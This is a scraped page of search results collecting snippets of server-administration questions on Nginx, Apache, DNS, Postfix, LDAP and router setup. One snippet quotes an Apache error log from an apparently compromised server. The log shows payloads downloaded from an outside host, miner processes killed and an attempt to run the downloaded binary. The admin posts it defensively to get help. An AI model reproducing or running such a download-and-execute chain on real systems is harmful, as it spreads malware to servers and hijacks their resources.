Search Results

Search found 58625 results on 2345 pages for 'alex blyth@oracle com'.

Page 337/2345 | < Previous Page | 333 334 335 336 337 338 339 340 341 342 343 344  | Next Page >

  • Nginx: Loopback connection via PHP's getimage size crashes server (Magento's CMS)

    - by Alex
    We were able to trace down a problem that is crashing our NGINX server running Magento until the following point: Background info: Magento Backend has a CMS function with a WYSIWYG editor. This editor loads some pictures via a controller in magento (cms/directive). When we set the NGINX error_log level to info, we get the following lines (line break inserted for better readability): 2012/10/22 18:05:40 [info] 14105#0: *1 client closed prematurely connection, so upstream connection is closed too while sending request to upstream, client: XXXXXXXXX, server: test.local, request: "GET index.php/admin/cms_wysiwyg/directive/___directive/BASEENCODEDIMAGEURL,,/ HTTP/1.1", upstream: "fastcgi://127.0.0.1:9024", host: "test.local" When checking the code in the debugger, the following call does never return (in ´Varien_Image_Adapter_Abstract::getMimeType()` # $this->_fileName is http://test.local/skin/adminhtml/base/default/images/demo-image-not-existing.gif` # $_SERVER['REQUEST_URI'] = http://test.local/admin/cms_wysiwyg/directive/___directive/BASEENCODEDIMAGEURL list($this->_imageSrcWidth, $this->_imageSrcHeight, $this->_fileType, ) = getimagesize($this->_fileName); The filename requests is an URL to the same server which is requesting the script a link to a static .gif that is not existing. Sample URL: http://test.local/skin/adminhtml/base/default/images/demo-image-not-existing.gif When the above line executed, any subsequent request to the NGNIX server does not respond any more. After waiting for around 10 minutes, the NGINX server starts answering requests again. I tried to reproduce the error with a simple test script that only calls getimagesize() with the given URL - but this not crash. It simple leads to an exception saying that the URL could not be loaded (which is fine as the URL is wrong)

    Read the article

  • NSD reply from unexpected source

    - by Ximik
    I have server with NSD. There are MAIN_IP and ADD_IP. When I try to get IP of my site from server I have right output dig @localhost my_site.com But when I try to make this from my PC, I have dig @my_ns_server.com my_site.com ;; reply from unexpected source: MAIN_IP#53, expected ADD_IP#53 (ADD_IP is IP of my_ns_server.com) What should I do? UPD: My interfaces conf auto eth2 allow-hotplug eth2 iface eth2 inet static address xxx.xxx.xxx.234 netmask 255.255.255.252 network xxx.xxx.xxx.232 broadcast xxx.xxx.xxx.235 gateway xxx.xxx.xxx.233 dns-nameservers MY_ISP_IP dns-search MY_ISP_DOMAIN auto eth2:0 iface eth2:0 inet static address xxx.xxx.xxx.124 netmask 255.255.255.0 xxx.xxx.xxx is the same for all IPs

    Read the article

  • 404 with serving static files in a custom nginx configuration

    - by code90
    In my nginx configuration, I have the following: location /admin/ { alias /usr/share/php/wtlib_4/apps/admin/; location ~* .*\.php$ { try_files $uri $uri/ @php_admin; } location ~* \.(js|css|png|jpg|jpeg|gif|ico|pdf|zip|rar|air)$ { expires 7d; access_log off; } } location ~ ^/admin/modules/([^/]+)(.*\.(html|js|json|css|png|jpg|jpeg|gif|ico|pdf|zip|rar|air))$ { alias /usr/share/php/wtlib_4/modules/$1/admin/$2; } location ~ ^/admin/modules/([^/]+)(.*)$ { try_files $uri @php_admin_modules; } location @php_admin { if ($fastcgi_script_name ~ /admin(/.*\.php)$) { set $valid_fastcgi_script_name $1; } fastcgi_pass $byr_pass; fastcgi_index index.php; fastcgi_param SCRIPT_FILENAME /usr/share/php/wtlib_4/apps/admin$valid_fastcgi_script_name; fastcgi_param REDIRECT_STATUS 200; include /etc/nginx/fastcgi_params; } location @php_admin_modules { if ($fastcgi_script_name ~ /admin/modules/([^/]+)(.*)$) { set $byr_module $1; set $byr_rest $2; } fastcgi_pass $byr_pass; fastcgi_index index.php; fastcgi_param SCRIPT_FILENAME /usr/share/php/wtlib_4/modules/$byr_module/admin$byr_rest; fastcgi_param REDIRECT_STATUS 200; include /etc/nginx/fastcgi_params; } Following is the requested url which ends up with "404": http://www.{domainname}.com/admin/modules/cms/styles/cms.css Following is the error log: [error] 19551#0: *28 open() "/usr/share/php/wtlib_4/apps/admin/modules/cms/styles/cms.css" failed (2: No such file or directory), client: xxx.xxx.xxx.xxx, server: {domainname}.com, request: "GET /admin/modules/cms/styles/cms.css HTTP/1.1", host: "www.{domainname}.com" Following urls works fine: http://www.{domainname}.com/admin/modules/store/?a=manage http://www.{domainname}.com/admin/modules/cms/?a=cms.load Can anyone see what the problem could be? Thanks. PS. I am trying to migrate existing sites from apache to nginx.

    Read the article

  • Wireless Access Point stopped working

    - by Alex Pritchard
    I have a simple LAN set up at home using a Linksys WRT54GSV4 as my primary router and an Encore ENHWI-2AN3 as an access point. I connect the Encore to the Linksys by running a cable from one of the Linksys LAN ports into the Encore WAN input. I originally configured this using the Encore setup wizard, setting the device up in AP Router Mode. It detected the input network and worked about as expected, creating a second network that used my primary network to connect to the internet. It worked fine for about 2 weeks, then abruptly cut out today. I checked to make sure the network was still live through the cable going into the Encore (provides internet when connected to a laptop directly) and that devices are still able to connect to the network being broadcast by the Encore. When I try to rerun the connection wizard on the Encore, I receive the message "No Services found in WAN port." The WAN Settings is no longer retrieving a dynamic ip from the line. I tried providing a static IP, assigning an IP address within the subnet range of my primary router that wasn't being used and pointing the Default Gateway to the Linksys IP, but this did not work either. When I plug the cable into the WAN port, an internet light comes on that is not lit when a live network is not connected. I've tried doing a hard reset on the Encore (held down the rest button until the lights flashed, reconfigured from scratch), but the WAN settings are still not detected. Also tried powering off and on the modem, linksys, and encore. Any suggestions would be appreciated!

    Read the article

  • Forums that compell one to read? [closed]

    - by Alex
    I want to create a forum for a very specific, somewhat fight-club-like area of information. The participants need to be unique, not people I know. To be precise, it needs to be an entirely random set of participants. To do this I am going on the assumption that whatever a potential viewer sees when he visits this particular domain he will be COMPELLED to go further. He feels an intense urge within him to read more. I need forum software that will evoke this feeling regardless of the content. Minimal and aesthetically fluid and functional. It must have.. zen.. What are my options?

    Read the article

  • Apache error log interpretation

    - by HTF
    It looks like someone gained access to my server. How I can find out which Apache vHosts this log is related to? How these commands from the log are invoked and how/why they are printed to the log file - is this some remote shell or PHP script? /var/log/httpd/error_log mkdir: cannot create directory `/tmp/.kdso': File exists --2014-06-13 13:29:17-- http://updates.dyndn-web.com/abc.txt Resolving updates.dyndn-web.com... 94.23.49.91 Connecting to updates.dyndn-web.com|94.23.49.91|:80... connected. HTTP request sent, awaiting response... 200 OK Length: 5055 (4.9K) [text/plain] Saving to: `abc.txt' 0K .... 100% 303K=0.02s 2014-06-13 13:29:17 (303 KB/s) - `abc.txt' saved [5055/5055] % Total % Received % Xferd Average Speed Time Time Time Current Dload Upload Total Spent Left Speed ^M 0 0 0 0 0 0 0 0 --:--:-- --:--:-- --:--:-- 0^M101 5055 101 5055 0 0 79686 0 --:--:-- --:--:-- --:--:-- 154k minerd64: no process killed minerd32: no process killed named: no process killed kernelupdates: no process killed kernelcfg: no process killed kernelorg: no process killed ls: cannot access /tmp/.ICE-unix: No such file or directory mkdir: cannot create directory `/tmp': File exists --2014-06-13 13:29:18-- http://updates.dyndn-web.com/64.tar.gz Resolving updates.dyndn-web.com... 94.23.49.91 Connecting to updates.dyndn-web.com|94.23.49.91|:80... connected. HTTP request sent, awaiting response... 200 OK Length: 205812 (201K) [application/x-tar] Saving to: `64.tar.gz' 0K .......... .......... .......... .......... .......... 24% 990K 0s 50K .......... .......... .......... .......... .......... 49% 2.74M 0s 100K .......... .......... .......... .......... .......... 74% 2.96M 0s 150K .......... .......... .......... .......... .......... 99% 3.49M 0s 200K 100% 17.4M=0.1s 2014-06-13 13:29:18 (1.99 MB/s) - `64.tar.gz' saved [205812/205812] sh: ./kernelupgrade: Permission denied

    Read the article

  • Nginx server 301 Moved permanently

    - by user145714
    When I did a curl -v http://site-wordpress.com:81 I received this result: About to connect() to site-wordpress.com port 81 (#0) Trying ip... connected Connected to site-wordpress.com (ip) port 81 (#0) GET / HTTP/1.1 User-Agent: curl/7.19.7 (x86_64-unknown-linux-gnu) libcurl/7.19.7 NSS/3.12.6.2 zlib/1.2.3 libidn/1.18 libssh2/1.2.2 Host: site-wordpress.com:81 Accept: / < HTTP/1.1 301 Moved Permanently < Server: nginx/1.2.4 < Date: Fri, 16 Nov 2012 16:28:19 GMT < Content-Type: text/html; charset=UTF-8 < Transfer-Encoding: chunked < Connection: keep-alive < X-Pingback: The URL above/xmlrpc.php < Location: The URL above Seems like this line in my fastcgi_params is causing grief. fastcgi_param SCRIPT_FILENAME $document_root$fastcgi_script_name; If I remove this line , I get HTTP/1.1 200 OK but I get a blank page. This is my config: server { listen 81; server_name site-wordpress.com; root /var/www/html/site; access_log /var/log/nginx/access.log; error_log /var/log/nginx/error.log; index index.php; if (!-e $request_filename){ rewrite ^(.*)$ /index.php break; } location ~ \.php$ { fastcgi_pass 127.0.0.1:9000; # port where FastCGI processes were spawned fastcgi_index index.php; include /etc/nginx/fastcgi_params; include /etc/nginx/mime.types; } location ~ \.css { add_header Content-Type text/css; } location ~ \.js { add_header Content-Type application/x-javascript; } } This config works with ip and port 80. But now I need to use a domain name and port 81, which doesn't work. Could someone please help. Thanks.

    Read the article

  • Multiple SSL vhosts using wildcard certificate in nginx

    - by vvanscherpenseel
    I have two hostnames sharing the same domain name which I want to serve over HTTPs. I've got a wildcard-SSL certificate and created two vhost configs: Host A listen 127.0.0.1:443 ssl; server_name a.example.com; root /data/httpd/a.example.com; ssl_certificate /etc/ssl/wildcard.cer; ssl_certificate_key /etc/ssl/wildcard.key; Host B listen 127.0.0.1:443 ssl; server_name b.example.com; root /data/httpd/b.example.com; ssl_certificate /etc/ssl/wildcard.cer; ssl_certificate_key /etc/ssl/wildcard.key; However, I get the same vhost served for either hostname.

    Read the article

  • Optimise Apache for EC2 micro instance

    - by Shiyu Sekam
    I'm running apache2 on a EC2 micro instance with ~600 mb RAM. The instance was running for almost a year without problems, but in the last weeks it just keeps crashing, because the server reached MaxClients. The server basically runs few websites, one wordpress blog(not often used), company website(most used) and 2 small sites, which are just internal. The database for the blog runs on RDS, so there's no Mysql running on this web server. When I came to the company, the server already was setup and is running apache + mod_php + prefork. We want to migrate that in the future to a nginx + php-fpm, but it still needs further testing. So for now I have to stick with the old setup. I also use CloudFlare DDOS protection in front of the server, because it was attacked a couple of the times in the last weeks. My company don't want to pay money for a better web server at this point, so I have to stick with the micro instance also. Additionally the code for the website we run is really bad and slow and sometimes a single page load can take up to 15 seconds. The whole website is dynamic and written in PHP, so caching isn't really an option here. It's a customized search for users. I've already turned off KeepAlive, which improved the performance a little bit. My prefork config looks like the following: StartServers 2 MinSpareServers 2 MaxSpareServers 5 ServerLimit 10 MaxClients 10 MaxRequestsPerChild 100 The server just becomes unresponsive after a while running and I've run the following command to see how many connections there are: netstat | grep http | wc -l 75 Trying to restart apache helps for a short moment, but after that a while the apache process(es) become unresponsive again. I've the following modules enabled(output of apache2ctl -M) Loaded Modules: core_module (static) log_config_module (static) logio_module (static) version_module (static) mpm_prefork_module (static) http_module (static) so_module (static) alias_module (shared) authz_host_module (shared) deflate_module (shared) dir_module (shared) expires_module (shared) mime_module (shared) negotiation_module (shared) php5_module (shared) rewrite_module (shared) setenvif_module (shared) ssl_module (shared) status_module (shared) Syntax OK apache2.conf # Security ServerTokens OS ServerSignature On TraceEnable On ServerName "web.example.com" ServerRoot "/etc/apache2" PidFile ${APACHE_PID_FILE} Timeout 30 KeepAlive off User www-data Group www-data AccessFileName .htaccess <Files ~ "^\.ht"> Order allow,deny Deny from all Satisfy all </Files> <Directory /> Options FollowSymLinks AllowOverride None </Directory> DefaultType none HostnameLookups Off ErrorLog /var/log/apache2/error.log LogLevel warn EnableSendfile On #Listen 80 Include /etc/apache2/mods-enabled/*.load Include /etc/apache2/mods-enabled/*.conf Include /etc/apache2/ports.conf LogFormat "%h %l %u %t \"%r\" %>s %b \"%{Referer}i\" \"%{User-Agent}i\"" combined LogFormat "%h %l %u %t \"%r\" %>s %b" common LogFormat "%{Referer}i -> %U" referer LogFormat "%{User-agent}i" agent Include /etc/apache2/conf.d/*.conf Include /etc/apache2/sites-enabled/*.conf Vhost of main site <VirtualHost *:80> ServerName www.example.com ## Vhost docroot DocumentRoot /srv/www/jenkins/Web ## Directories, there should at least be a declaration for /srv/www/jenkins/Web <Directory /srv/www/jenkins/Web> AllowOverride All Order allow,deny Allow from all </Directory> ## Load additional static includes ## Logging ErrorLog /var/log/apache2/www.example.com.error.log LogLevel warn ServerSignature Off CustomLog /var/log/apache2/www.example.com.access.log combined ## Rewrite rules RewriteEngine On RewriteCond %{HTTP_HOST} !^www.example.com$ RewriteRule ^.*$ http://www.example.com%{REQUEST_URI} [R=301,L] ## Server aliases ServerAlias www.example.invalid ServerAlias example.com ## Custom fragment <Location /srv/www/jenkins/Web/library> Order Deny,Allow Deny from all </Location> <Files ~ "^\.(.+)"> Order deny,allow deny from all </Files> </VirtualHost>

    Read the article

  • Why doesn't postfix use my smtp_generic_maps?

    - by RichardTheKiwi
    What have I set up incorrectly? >postconf -n .... smtp_generic_maps = regexp:/etc/postfix/rewrite .... >cat /etc/postfix/rewrite /.*/ removed+postfix@gmail.com >echo "test" | mail -s "test" tester2@mailinator.com >tail -f /var/log/mail.log Dec 8 05:56:01 xxxxxxxxxxxx postfix/pickup[20227]: E9272709284: uid=501 from=<yyyy> Dec 8 05:56:01 xxxxxxxxxxxx postfix/cleanup[20270]: E9272709284: message-id=<[email protected]> Dec 8 05:56:01 xxxxxxxxxxxx postfix/qmgr[20228]: E9272709284: from=<[email protected]>, size=331, nrcpt=1 (queue active) Dec 8 05:56:03 xxxxxxxxxxxx postfix/smtp[20272]: E9272709284: to=<[email protected]>, relay=mailinator.com[72.51.33.80]:25, delay=1.1, delays=0.02/0.01/0.48/0.58, dsn=2.0.0, status=sent (250 Ok) FYI, I have reloaded postfix many times sudo postfix reload Note: This is on OSX 10.7.5

    Read the article

  • How to configure a static wildcard subdomain with dnsmasq.

    - by Prody
    I have a network behind a NAT with a few machines. The machines are: router - NAT, dnsmasq, forwarding - directly connected to the inet server - which runs ssh, www and some other stuff clients - which do stuff on server I also have mydomain.com. server.mydomain.com is pointing to my connection's IP (single IP), which is the router, which forwards ports to server. Server, has a httpd running, which serves different sites based on vhosts. So I have site1.server.mydomain.com, site2.. The problem is that all the traffic is going thru the router, and when I check logs I always see the router's IP for everything (so it's hard to see who is running the script with the while(1)). I would just ServerAlias site1.server.local, but most of the sites have a root URL saved somewhere on top of which other URLs are built, so I can't do that. The solution for me would be telling dnsmasq somehow to answer to *.mydomain.com with server's IP. Is this possible somehow?

    Read the article

  • How to set local alias for a machine?

    - by Alex G.
    I would like to set an alias on my local PC for a network machine. I know that it can be done by adding an entry in the hosts file as long as the IP address of the machine is also specified. However, the problem is that IPs are dynamically assigned by a DHCP server so I don't know for sure the IP address. Is there a way to define just an alias based on the machine's network name? P.S.: I'm running Windows Server 2008 R2.

    Read the article

  • Lazy linux backup system?

    - by Alex
    Ok, so I want to say Time Machine, but that's note exactly what I'm looking for. I want to set up a system that will regularly (hourly?) back up the /home directory of our machine. time Machine style things are naturally preferable since they save space by only saving the changes, but honestly, this is important enough that I can suffer some waste. Any ideas?

    Read the article

  • Soft links between samba profile and profile.V2

    - by Alex Rose
    I am currently using a samba server to host windows sessions. For the moment, every machine runs windows XP, but in an upcoming hardware upgrade, I will have new Windows 7 machines installed. The problem is that the user directory changed from XP to 7 (for instance 'My Documents' became 'Documents'). To solve that, samba created a folder called profile.V2, which contains files and folders for Windows 7. Now I would like to link the two profiles folders ('profile' from windows XP, 'profile.V2' from windows 7) so that a user can logon from a XP or 7 machine and still have access to the same files. I tried to create softlinks between folder pairs ('Documents' -­­ 'My documents') and it seems to work. My question is : is it likely to create issues in the future?

    Read the article

  • why page is automatically redirecting to some other sites

    - by raj
    In my browser (Firefox 10.0.7) the page is automatically redirect to some other sites without clicking any link. If I enter the superuser.com url after pressing Enter button, It redirect to some other sites. sometimes while refreshing also the page is redirect to some other site. It's redirecting to this sites http://result.seenfind.com/ncp/Default.aspx?term=gatlinburg%20cabin&u=1000670913 http://search.cpvee.com/search.php?q=gatlinburg+cabin&y=&f=2168&s= http://www.insidecelebritygossip.com/ I cleared all history and all but still same problem. I am using CentOS 6.3

    Read the article

  • Serving static content with Apache web server and Tomcat

    - by Hunter
    I've configured Apache web server and Tomcat like this: I created a new file in apache2/sites-available, named it "myDomain" with this content: <VirtualHost *:80> ServerAdmin admin@myDomain.com ServerName myDomain.com ServerAlias www.myDomain.com ProxyPass / ajp://localhost:8009 <Proxy *> AllowOverride AuthConfig Order allow,deny Allow from all Options -Indexes </Proxy> </VirtualHost> Enabled mod_proxy and myDomain a2enmod proxy_ajp a2ensite myDomain Edited Tomcat's server.xml (inside the Engine tag) <Host name="myDomain.com" appBase="webapps/myApp"> <Context path="" docBase="."/> </Host> <Host name="www.myDomain.com" appBase="webapps/myApp"> <Context path="" docBase="."/> </Host> This works great. But I don't like to put static files (html, images, videos etc.) into {tomcat home}/webapps/myApp's subfolders instead I'd like to put them the apache webserver's root WWW directory's subdirectories. And I'd like Apache web server to serve these files alone. How could I do this? So all incoming request will be forwarded to Tomcat except those that ask for a static file.

    Read the article

  • Is email forwarding to the sender's address usually blocked in Mail servers / MTA?

    - by codecowboy
    I've noticed that email forwarding to an address seems not to work if I send an email from the address to which I am forwarding email. This happens for GMail and Fasthosts mail servers. e.g I send an email to info@mail.com from myaddress@mail.com , info@mail.com is set to forward to myaddress@mail.com and the email never arrives. I realise this seems logical but it is a potential cause of confusion when testing email functionality in a web application (for me, anyway ;-). I would just like to know if this is standard for all MTA software so I can avoid confusing myself.

    Read the article

  • Apache mod_proxy

    - by mhouston100
    Uggh, I'm spewing that I can't figure this out, I'm so frustrated: <VirtualHost *:80> servername domain1.com.au ServerAdmin webmaster@localhost DocumentRoot /var/www/html ErrorLog ${APACHE_LOG_DIR}/error.log CustomLog ${APACHE_LOG_DIR}/access.log combined <Proxy *> Order Allow,Deny Allow from all </Proxy> RewriteEngine on ReWriteCond %{SERVER_PORT} !^443$ RewriteRule ^/(.*) https://%{HTTP_HOST}/$1 [NC,R,L] </VirtualHost> <VirtualHost *:443> servername domain1.com.au SSLEngine on SSLCertificateFile /etc/apache2/ssl/owncloud.pem SSLCertificateKeyFile /etc/apache2/ssl/owncloud.key DocumentRoot /var/www/html </VirtualHost> <VirtualHost *:*> Servername domain2.com.au ProxyRequests Off <Proxy *> Order deny,allow Allow from all </Proxy> ProxyPass / https://192.168.1.12/ ProxyPassReverse / https://192.168.1.12/ </VirtualHost> Not sure if it's clear what I'm trying to do, but I've read and read and READ, I still can't figure it out. Basically I have a working Apache server with a rewrite to force HTTPS, as seen in the first two VirtualHost entries. I now have a webmail service I set up on another server, under another domain name, however I only have one incoming public IP address. So I'm trying to have any incoming requests for the second domain to be proxied to the other server to access the webmail, whether its port 80 or 443. IMAP and POP3 are no problems, I can just forward the ports directly to the correct server. The results of the above configuration is that requests to domain2.com.au (port 80 or 443) are forwarded to https://domain1.com.au. Am I headed in the right direction?

    Read the article

  • Windows 7 RDP Problem - connecting to external zone with computer names

    - by alex
    I recently installed Windows 7, all is well so far, apart from using RDP to access computers outside my domain. We use a datacenter, outside of our domain. I was using Windows Vista before (not sure if this is relevant) - I could RDP no problem to the machines (using their machine names - Web10 for example) I have changed my IP address to be the same as it was when i was using vista We use a draytek firewall - we use DMZ Host to map my IP to an external ip- which is allowed to access the datacenter I've disabled windows firewall When i try to connect in Remote Desktop client, using Web10, I can't connect, however, if I enter the actual IP address, i can. I have run out of ideas... any help is appreciated!

    Read the article

  • How do I host multiple domains on Ubuntu Server (Hardy Heron)?

    - by markle976
    I am trying to figure out the best way to host multiple domains on my Ubuntu server. I have tried multiple options, but I can't get everything to work the way I want it to. I want to be able to add domains without having to restart Apache each time. I tried using mod_vhost_alias (see below), but that maps www.domain.com and domain.com to different folders. I also need to be able to use mod_rewite to map requests for domain.com/app/* to domain.com/somescript.php current httpd.conf: UseCanonicalName Off VirtualDocumentRoot /var/www/%0 Any thoughts?

    Read the article

  • Set Thunderbird "from" address by incoming "to" address

    - by user293698
    I have configured my email server to cache all email to my mailbox. So x@mydomain.com and y@mydomain.com go to one mailbox. Every forum, registration, and guy get their own address for sending me emails so I can deliver it to /dev/null if anyone start spamming. That's the working setup. Now the problem: If I reply to a message, then Thunderbird always sets my default Identity as sender. I know I can add additional identities, but I don't want to add every address. How can I configure when a email is sent to x@mydomain.com, I answer with x@mydomain.com.

    Read the article

  • Trying to Set up SMTP Server on WIndows Server 2012

    - by datc
    I'm working on a website, and I need to test the functionality of sending email messages from ASP.NET, something like this: Dim msg As New MailMessage("email1", "email2") msg.Subject = "Subject"<br> msg.IsBodyHtml = True<br> msg.Body = "Click <a href='site'>here</a>." Dim client As SmtpClient = New SmtpClient() client.Host = "My-Server"<br> client.Port = 25<br> client.DeliveryMethod = SmtpDeliveryMethod.Network<br> client.Send(msg) This is running from a Windows 8 workstation. I've installed SMTP server on my Windows Server 2012 machine. The mail shows up in the mailroot/Queue folder and sits there, eventually getting deposited into Badmail. Now I have AT&T U-verse at home, and a few devices connected to the gateway, including let's call it "My-Server." When I run SmtpDiag from say, datc@... to datc@hotmail.com I get SOA serial number match passed, Local DNS (99-135-60-233.lightspeed.bcvloh.sbcglobal.net) & Remote DNS (hotmail.com) tests *not* passed, and ultimately, Connecting to the server failed. Error: 10060. Failed to submit mail to mx2.hotmail.com error. When I set My-Server's IP to static and equal to the external IP, 99.135.60.233, and again run SmtpDiag, I get SOA, Local DNS, and Remote DNS tests passed, but the same 10060 error. Same for yahoo.com, gmail.com, and so forth. Is it my ISP's job to fix this? Some PTR record missing somewhere? Is it at all possible to have a home-based SMTP server? All I want is to test my email code. Perhaps, my IP address is just not "trusted" somehow. Thanks.

    Read the article

  • What is my BaseDN supposed to be with the following configuration of OpenLDAP?

    - by fuzzy lollipop
    I have the following in my OpenLDAP configuration. Using the latest version OpenLDAP on Centos 5.3. Installed using yum. From my /etc/openldap/slapd.conf database bdb suffix "dc=company,dc=com" rootdn "cn=Manager,dc=company,dc=com" From my /etc/openldap/ldap.conf BASE dc=company,dc=com I have successfully added an entry with ldapadd and retrieved it with ldapsearch from a local bash shell on the box. Now I am trying to get a Graphical Editor to connect to this server remotely so I can enter people from my laptop. But I am having no luck. I tried JXplorer, and it connects with Anonymous bind without me having to specify a BaseDN but I can't edit anything that way. If I try and give it a user name and password, using Manager and my rootpw I have in clear text just for testing, every GUI Client on my remote laptop complains about my BaseDN not being the correct format when I enter dc=company,dc=com and I tried cn=Manager,dc=company,dc=com. Error opening connection: [LDAP: error code 34 - invalid DN] I have tried multiple clients and all of them connect as anonymous, none let me connect authenticated where I can actually create or edit anything. I am using Manager as my username and the password from rootpw, is that correct?

    Read the article

< Previous Page | 333 334 335 336 337 338 339 340 341 342 343 344  | Next Page >